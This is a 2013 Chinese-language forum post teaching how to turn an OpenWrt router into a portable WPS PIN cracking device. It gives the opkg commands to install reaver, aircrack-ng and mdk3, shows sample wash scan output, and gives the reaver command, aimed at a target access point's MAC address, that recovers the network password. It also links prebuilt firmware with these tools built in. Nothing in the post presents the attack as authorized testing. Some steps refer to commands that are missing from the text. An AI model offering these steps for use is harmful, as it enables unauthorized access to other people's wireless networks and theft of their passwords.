少尉
- 注册时间
- 2012-2-22
- 金币
- 298 个
- 威望
- 1 个
- 荣誉
- 0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
|
本帖最后由 CEC0D5F1B6AB 于 2013-3-23 14:49 编辑
现在许多人使用电脑来pin,但是又不好的缺点,就是功耗太大,移动起来还不方便但是使用能刷Openwrt的路由来pin,正好弥补了这个缺点,目前市面上的路由普遍
功耗很低,移动起来方便,而且比较稳定,有的还有USB,可以外置网卡来pin,还可以用手机控制!(使用ssh客户端)
例如是用RG100A-AA + 8187L 使用的
使用的条件:
①路由支持刷Openwrt
②路由的无线芯片支持监听模式
③有4mb以上的flash
④熟悉linux命令行(只是简单的几句而已)
第一步
给路由刷上Openwrt(注意:最好刷上Openwrt官网的Openwrt原版固件,或者自己编译下)
官方固件可以从这里找
- http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/
第二步
刷好之后,安装reaver aircrack-ng screen mdk3等软件,注意安装时要连接上网络- opkg update
- opkg install reaver aircrack-ng screen mdk3
第三步
(wlan0是你要使用的网卡)
如果使用内置网卡的话要把wlan0停掉
这样才可以不被锁频道
成功之后
搜索可以pin的ap
这时候显示可以pin的ap
例如这样
- Wash v1.4 WiFi Protected Setup Scan Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- BSSID Channel RSSI WPS Version WPS Locked ESSID
- ---------------------------------------------------------------------------------------------------------------
- XX:XX:XX:XX:XX:XX 1 -85 1.0 No dlink
使用- reaver -i mon0 -b XX:XX:XX:XX:XX:XX
XX:XX:XX:XX:XX:XX是你目标AP的mac地址
这样就可以pin下去了,
注意,目标ap需要有足够的信号才可以,不然会提示无可预测的错误(这里请大家自行测试)
后台教程
使用screen进入后台后进行由第一步开始
开始pin后可以命令行的窗口,这样就可以后台了
下次进入后才就要输入
进行恢复
如果pin成功命令行会有密码显示的
如果你担心掉电或者死机的话
那么可以使用
- reaver -i mon0 -b XX:XX:XX:XX:XX:XX | tee pin.log
至于存档,就在你当前目录下就有可以,可以使用winscp来复制到本地,也可以复制过去
这里附上自己基于trunk编译的固件(编译时集成 reaver aircrack-ng screen mdk3 但是没有luci )
- http://openwrt-firmware.googlecode.com/files/openwrt-RG100A_DB120-squashfs-cfe.bin
(RG100A or DB120 集成了8187 和3070的驱动)
- http://openwrt-firmware.googlecode.com/files/openwrt-ramips-rt305x-hg255d-squashfs-sysupgrade.bin
(这个是hg255d的固件,集成luci,pin的基本工具等)
- http://openwrt-firmware.googlecode.com/files/openwrt-atheros-ubnt2-pico2-squashfs.bin
(340G之类的路由,没有usb,使用内置网卡pin,测试过可以,但是要32mb内存和8m flash)
|
评分
-
2
查看全部评分
-
|
[复制链接]
发表于 2013-3-23 14:46
